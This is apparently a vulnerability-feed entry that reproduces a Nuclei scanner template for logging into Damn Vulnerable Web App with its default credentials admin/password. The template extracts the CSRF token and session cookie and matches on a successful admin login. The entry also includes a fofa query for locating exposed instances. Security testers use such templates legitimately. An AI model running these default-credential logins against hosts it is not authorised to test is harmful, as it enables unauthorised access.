dvwa-default-login: DVWA Default Login

日期: 2025-08-01 | 影响软件: dvwa-default-login | POC: 已公开

漏洞描述

Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario. fofa: app="Damn-Vulnerable-Web-App-(DVWA)-Login"

PoC代码[已公开]

id: dvwa-default-login

info:
  name: DVWA Default Login
  author: pdteam
  severity: critical
  description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
  reference:
    - https://opensourcelibs.com/lib/dvwa
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 2
  tags: dvwa,default-login,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Connection: close
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: PHPSESSID={{session}}; security=low
        Connection: close

        username={{username}}&password={{password}}&Login=Login&user_token={{token}}

    payloads:
      username:
        - admin
      password:
        - password
    attack: pitchfork

    extractors:
      - type: regex
        name: token
        group: 1
        internal: true
        part: body
        regex:
          - "hidden' name='user_token' value='([0-9a-z]+)'"

      - type: kval
        name: session
        internal: true
        part: body
        kval:
          - PHPSESSID
    host-redirects: true
    matchers:
      - type: word
        words:
          - "You have logged in as 'admin'"
# digest: 490a004630440220201404365eba7e7c66a3871324f4c85765baa33dc5f62c39b438d8a8cc488a0d02200db97a8412317790ab5a3b918351a34709d536ace525794b06570ccccf9ccf9e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/dvwa/dvwa-default-login.yaml